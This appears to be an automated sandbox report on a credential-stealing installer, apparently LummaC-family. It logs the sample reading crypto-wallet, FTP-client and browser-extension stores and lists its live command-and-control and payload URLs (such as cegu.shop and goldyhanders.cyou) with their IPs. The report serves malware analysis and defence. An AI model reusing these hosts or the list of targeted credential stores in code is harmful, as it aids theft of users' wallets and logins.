                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: Luther.comBinary or memory string: WIN_81
                Source: Luther.comBinary or memory string: WIN_XP
                Source: Page.9.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: Luther.comBinary or memory string: WIN_XPe
                Source: Luther.comBinary or memory string: WIN_VISTA
                Source: Luther.comBinary or memory string: WIN_7
                Source: Luther.comBinary or memory string: WIN_8
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: Yara matchFile source: 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000003.2271590725.000000000391B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000003.2260009291.000000000391B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000003.2259044723.000000000391B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000003.2247382365.000000000391B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000003.2288364664.0000000003919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000003.2285485834.0000000003919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000003.2271884207.000000000391B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000003.2247660690.000000000391B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000003.2246305731.000000000391B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Luther.com PID: 7696, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: Process Memory Space: Luther.com PID: 7696, type: MEMORYSTR
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00EB2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,13_2_00EB2263
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00EB1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,13_2_00EB1C61
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                121
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                2
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                2
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts1
                Native API
                2
                Valid Accounts
                1
                DLL Side-Loading
                11
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol41
                Data from Local System
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell
                Logon Script (Windows)2
                Valid Accounts
                2
                Obfuscated Files or Information
                Security Account Manager13
                File and Directory Discovery
                SMB/Windows Admin Shares21
                Input Capture
                3
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                Access Token Manipulation
                1
                DLL Side-Loading
                NTDS37
                System Information Discovery
                Distributed Component Object Model3
                Clipboard Data
                114
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
                Process Injection
                11
                Masquerading
                LSA Secrets341
                Security Software Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                Valid Accounts
                Cached Domain Credentials31
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                Virtualization/Sandbox Evasion
                DCSync4
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem1
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                installer_1.05_37.4.exe14%VirustotalBrowse
                installer_1.05_37.4.exe24%ReversingLabs
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\224553\Luther.com0%ReversingLabs
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://goldyhanders.cyou/apijinh0%Avira URL Cloudsafe
                https://goldyhanders.cyou/=0%Avira URL Cloudsafe
                washyceehsu.lat0%Avira URL Cloudsafe
                https://goldyhanders.cyou/H0%Avira URL Cloudsafe
                bloodyswif.lat0%Avira URL Cloudsafe
                https://goldyhanders.cyou/$40.0%Avira URL Cloudsafe
                https://goldyhanders.cyou/90%Avira URL Cloudsafe
                leggelatez.lat0%Avira URL Cloudsafe
                https://cegu.shop/x100%Avira URL Cloudmalware
                https://cegu.shop/8574262446/ph.txt#100%Avira URL Cloudmalware
                kickykiduz.lat0%Avira URL Cloudsafe
                savorraiykj.lat0%Avira URL Cloudsafe
                miniatureyu.lat0%Avira URL Cloudsafe
                https://goldyhanders.cyou/0%Avira URL Cloudsafe
                goldyhanders.cyou0%Avira URL Cloudsafe
                https://cegu.shop/S100%Avira URL Cloudmalware
                https://cegu.shop/8574262446/ph.txt?100%Avira URL Cloudmalware
                https://goldyhanders.cyou/api.00%Avira URL Cloudsafe
                https://goldyhanders.cyou/i0%Avira URL Cloudsafe
                https://cegu.shop/8574262446/ph.txtebKit/537.36100%Avira URL Cloudmalware
                https://goldyhanders.cyou/h.0%Avira URL Cloudsafe
                https://goldyhanders.cyou/l0%Avira URL Cloudsafe
                finickypwk.lat0%Avira URL Cloudsafe
                https://goldyhanders.cyou/api100%Avira URL Cloudmalware
                https://goldyhanders.cyou/S0%Avira URL Cloudsafe
                shoefeatthe.lat0%Avira URL Cloudsafe
                https://cegu.shop:443/8574262446/ph.txtoft100%Avira URL Cloudmalware
                https://goldyhanders.cyou/apijpjb0%Avira URL Cloudsafe
                https://goldyhanders.cyou:443/apiMicrosoft0%Avira URL Cloudsafe
                https://goldyhanders.cyou:443/api100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                cegu.shop
                185.161.251.21
                truefalse
                  high
                  goldyhanders.cyou
                  104.21.16.1
                  truetrue
                    unknown
                    jIUAzCVEKkxMKZXfO.jIUAzCVEKkxMKZXfO
                    unknown
                    unknownfalse
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      bloodyswif.lattrue
                      • Avira URL Cloud: safe
                      unknown
                      washyceehsu.lattrue
                      • Avira URL Cloud: safe
                      unknown
                      leggelatez.lattrue
                      • Avira URL Cloud: safe
                      unknown
                      kickykiduz.lattrue
                      • Avira URL Cloud: safe
                      unknown
                      savorraiykj.lattrue
                      • Avira URL Cloud: safe
                      unknown
                      goldyhanders.cyoutrue
                      • Avira URL Cloud: safe
                      unknown
                      miniatureyu.lattrue
                      • Avira URL Cloud: safe
                      unknown
                      https://cegu.shop/8574262446/ph.txtfalse
                        high
                        finickypwk.lattrue
                        • Avira URL Cloud: safe
                        unknown
                        shoefeatthe.lattrue
                        • Avira URL Cloud: safe
                        unknown
                        https://goldyhanders.cyou/apitrue
                        • Avira URL Cloud: malware
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://duckduckgo.com/chrome_newtabLuther.com, 0000000D.00000003.2246201990.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.00000000038E9000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://duckduckgo.com/ac/?q=Luther.com, 0000000D.00000003.2246201990.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.00000000038E9000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://goldyhanders.cyou/HLuther.com, 0000000D.00000003.2285485834.0000000003919000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://cegu.shop/Luther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://dfgh.online/invoker.php?compName=Luther.com, 0000000D.00000002.4497796930.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000002.4497796930.0000000003A02000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000002.4497541378.00000000038B0000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000002.4497541378.00000000038BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Luther.com, 0000000D.00000003.2246201990.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.00000000038E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://goldyhanders.cyou/9Luther.com, 0000000D.00000002.4497214664.000000000145E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.autoitscript.com/autoit3/Luther.com, 0000000D.00000003.2221201231.0000000003DCC000.00000004.00000800.00020000.00000000.sdmp, Webshots.9.dr, Luther.com.2.drfalse
                                    high
                                    https://goldyhanders.cyou/=Luther.com, 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2271590725.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2260009291.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2259044723.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2288364664.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2247382365.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2271884207.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2285485834.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2247660690.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.000000000391B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://x1.c.lencr.org/0Luther.com, 0000000D.00000003.2271884207.00000000038D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://x1.i.lencr.org/0Luther.com, 0000000D.00000003.2271884207.00000000038D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchLuther.com, 0000000D.00000003.2246201990.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.00000000038E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://cegu.shop/xLuther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://klipgonuh.shop/int_clp_sha.txtLuther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://cegu.shop/8574262446/ph.txt#Luther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            https://support.mozilla.org/products/firefoxgro.allLuther.com, 0000000D.00000003.2272933536.000000000525B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://goldyhanders.cyou/$40.Luther.com, 0000000D.00000003.2271590725.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2271884207.000000000391B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://goldyhanders.cyou/apijinhLuther.com, 0000000D.00000003.2285485834.0000000003919000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://goldyhanders.cyou/Luther.com, 0000000D.00000002.4497214664.000000000145E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoLuther.com, 0000000D.00000003.2246201990.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.00000000038E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Luther.com, 0000000D.00000003.2246201990.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.00000000038E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0Luther.com, 0000000D.00000003.2271884207.00000000038D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://cegu.shop/8574262446/ph.txt?Luther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://www.autoitscript.com/autoit3/XLuther.com, 0000000D.00000003.2221201231.0000000003DCC000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmp, Luther.com.2.dr, Page.9.drfalse
                                                      high
                                                      https://goldyhanders.cyou/api.0Luther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://ocsp.rootca1.amazontrust.com0:Luther.com, 0000000D.00000003.2271884207.00000000038D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://nsis.sf.net/NSIS_ErrorErrorinstaller_1.05_37.4.exefalse
                                                          high
                                                          https://cegu.shop/SLuther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://www.ecosia.org/newtab/Luther.com, 0000000D.00000003.2246201990.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.00000000038E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brLuther.com, 0000000D.00000003.2272933536.000000000525B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://cegu.shop/8574262446/ph.txtebKit/537.36Luther.com, 0000000D.00000002.4496055520.00000000009DA000.00000004.00000010.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://ac.ecosia.org/autocomplete?q=Luther.com, 0000000D.00000003.2246201990.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.00000000038E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://goldyhanders.cyou/iLuther.com, 0000000D.00000002.4497214664.000000000145E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://goldyhanders.cyou/h.Luther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://goldyhanders.cyou/lLuther.com, 0000000D.00000002.4497214664.000000000145E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?Luther.com, 0000000D.00000003.2271884207.00000000038D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://goldyhanders.cyou/SLuther.com, 0000000D.00000003.2271590725.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2288364664.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2271884207.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2285485834.0000000003919000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://cegu.shop:443/8574262446/ph.txtoftLuther.com, 0000000D.00000002.4497796930.0000000003A15000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Luther.com, 0000000D.00000003.2246201990.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.00000000038E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://goldyhanders.cyou/apijpjbLuther.com, 0000000D.00000003.2271590725.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2271884207.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2285485834.0000000003919000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://goldyhanders.cyou:443/apiLuther.com, 0000000D.00000002.4497796930.0000000003A15000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    unknown
                                                                    https://goldyhanders.cyou:443/apiMicrosoftLuther.com, 0000000D.00000002.4497796930.0000000003A15000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs
                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    104.21.16.1
                                                                    goldyhanders.cyouUnited States
                                                                    13335CLOUDFLARENETUStrue
                                                                    185.161.251.21
                                                                    cegu.shopUnited Kingdom
                                                                    5089NTLGBfalse
                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                    Analysis ID:1589445
                                                                    Start date and time:2025-01-12 15:28:06 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 8m 19s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:17
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:installer_1.05_37.4.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@26/22@3/2
                                                                    EGA Information:
                                                                    • Successful, ratio: 100%
                                                                    HCA Information:
                                                                    • Successful, ratio: 100%
                                                                    • Number of executed functions: 82
                                                                    • Number of non-executed functions: 294
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                    • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                    TimeTypeDescription
                                                                    09:28:56API Interceptor1x Sleep call for process: installer_1.05_37.4.exe modified
                                                                    09:29:00API Interceptor10x Sleep call for process: Luther.com modified
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    104.21.16.18L6MBxaJ2m.exeGet hashmaliciousFormBookBrowse
                                                                    • www.rafconstrutora.online/0xli/
                                                                    NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                                    • www.kkpmoneysocial.top/86am/
                                                                    JNKHlxGvw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                    • 188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php
                                                                    185.161.251.21Setup.exeGet hashmaliciousLummaCBrowse
                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                          Full-Ver_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                            https://patiooutletmaipu.cl/tiendas/head/Get hashmaliciousLummaC, CAPTCHA Scam ClickFix, LummaC StealerBrowse
                                                                              appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                                  setup.exeGet hashmaliciousLummaCBrowse
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    cegu.shopSetup.exeGet hashmaliciousLummaCBrowse
                                                                                    • 185.161.251.21
                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                    • 185.161.251.21
                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                    • 185.161.251.21
                                                                                    Full-Ver_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 185.161.251.21
                                                                                    https://patiooutletmaipu.cl/tiendas/head/Get hashmaliciousLummaC, CAPTCHA Scam ClickFix, LummaC StealerBrowse
                                                                                    • 185.161.251.21
                                                                                    appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 185.161.251.21
                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                    • 185.161.251.21
                                                                                    setup.exeGet hashmaliciousLummaCBrowse
                                                                                    • 185.161.251.21
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    CLOUDFLARENETUSSetup.msiGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.34.147
                                                                                    Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.139.144
                                                                                    PDF-523.msiGet hashmaliciousAteraAgentBrowse
